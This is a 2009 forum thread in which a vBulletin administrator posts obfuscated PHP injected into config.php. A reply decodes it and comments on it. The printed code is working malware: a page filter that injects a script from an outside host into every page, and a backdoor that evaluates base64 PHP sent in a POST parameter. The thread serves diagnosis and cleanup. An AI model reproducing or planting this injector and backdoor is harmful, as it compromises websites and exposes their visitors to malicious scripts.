
problem in my vBulletin forum files, please help!



crazy.works
10-29-2009, 05:16 PM
Hello, I have a forum; I installed vBulletin 3.8.4 nulled by DGT on it...
It was working very well, but after a couple of days the forum shut down with this error on the home page:


Fatal error: Cannot redeclare kch() (previously declared in /home/gongring/public_html/index.php(1) : eval()'d code:1) in /home/gong/public_html/includes/config.php(1) : eval()'d code on line 1


and an error like it in the admin control panel too. Besides, when I checked the config.php file, I found it had been edited somehow and this code had been added to it!!



<?php eval(base64_decode('aWYoIWlzc2V0KCRrY2gxKSl7ZnVuY3Rpb24ga2NoKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3Jp cHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9 cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChc W10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJv bUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9 aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1z dHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMlJ5TFcxb1lYTm9hVzB1WTI5dEww TnZiblJoWTNSVmN5OXRlV0ZzWW5WdExuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5Jykp JHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7 cmV0dXJuICRzO31mdW5jdGlvbiBrY2gyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJGtjaDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9l eGlzdHMoJGtjaDEpKWNhbGxfdXNlcl9mdW5jKCRrY2gxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFz ICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2tjaCcpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAk c1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5k X2NsZWFuKCk7fW9iX3N0YXJ0KCdrY2gnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtl Y2hvICRzWyRpXVsxXTt9fX0ka2NobD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigna2NoMicpKSE9J2tjaDInKT8kYTowO2V2YWwo YmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>


So I wonder: was this new function that causes the error added by a hacker? Or has this vBulletin version just not been nulled very well, and the function was generated by the forum files themselves? Or maybe the files were edited somehow by the vBulletin team to disable the forum??
Please, any ideas about the reason for this error and the reason for the files being edited???
Thanks

Fou-Lu
10-30-2009, 03:08 AM
That code was likely injected:


if(!isset($kch1))
{
    // Output filter, registered with ob_start('kch') below: it rewrites every page
    // the forum sends. First it strips other injected <script> blocks (long
    // obfuscated strings, eval/fromCharCode/document.write)...
    function kch($s)
    {
        if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
            foreach($a[0] as $v)
                if(count(explode("\n",$v))>5)
                {
                    $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||
                       preg_match('#[\(\[](\s*\d+,){20,}#',$v);
                    if((preg_match('#\beval\b#',$v)&&
                        ($e||strpos($v,'fromCharCode')))||
                       ($e&&strpos($v,'document.write')))
                        $s=str_replace($v,'',$s);
                }
        // ...and hidden iframes (zero size or display:none) left by competing infections.
        if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))
            foreach($a[0] as $v)
                if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&
                   !strstr($v,'?'.'>'))
                    $s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);
        // Then it removes any earlier copy of its own script tag and re-inserts it
        // just before <body> (or appends it when there is no <body>).
        $s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2RyLW1oYXNoaW0uY29tL0NvbnRhY3RVcy9teWFsYnVtLnBocCA+PC9zY3JpcHQ+'),'',$s);
        // The above decodes to: <script src=http://dr-mhashim.com/ContactUs/myalbum.php ></script>
        if(stristr($s,'<body'))
            $s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);
        elseif(strpos($s,',a'))
            $s.=$a;
        return $s;
    }
    // Installed as the PHP error handler. On the first error it chains to the
    // previous handler, then unwinds the existing output buffers (stopping at
    // ob_gzhandler) and re-creates them on top of 'kch', so the filter above
    // sees the whole page even when other buffering is active.
    function kch2($a,$b,$c,$d)
    {
        global $kch1;
        $s=array();
        if(function_exists($kch1))
            call_user_func($kch1,$a,$b,$c,$d);
        foreach(@ob_get_status(1) as $v)
            if(($a=$v['name'])=='kch')
                return;
            elseif($a=='ob_gzhandler')
                break;
            else
                $s[]=array($a=='default output handler'?false:$a);
        for($i=count($s)-1;$i>=0;$i--)
        {
            $s[$i][1]=ob_get_contents();
            ob_end_clean();
        }
        ob_start('kch');
        for($i=0;$i<count($s);$i++)
        {
            ob_start($s[$i][0]);
            echo $s[$i][1];
        }
    }
}

// Register kch2 and keep the handler it displaced. Note the variable is $kchl,
// not the $kch1 that the isset() guard and kch2() read, so the guard never
// trips: with the block present in both index.php and config.php, kch() is
// declared twice, which is the "Cannot redeclare kch()" fatal error above.
$kchl=(($a=@set_error_handler('kch2'))!='kch2')?$a:0;
// Backdoor: executes whatever base64-encoded PHP arrives in the POST parameter 'e'.
eval(base64_decode($_POST['e']));


There is no reason for a built system to insert dynamic functions into itself.

You'll need to scan your access logs to see where the vulnerability exists. Look closely at anything that was through a POST or PUT method to see where the data came from (it will likely appear as the base64 encoded chunk) and what script and action it took to get it in there.


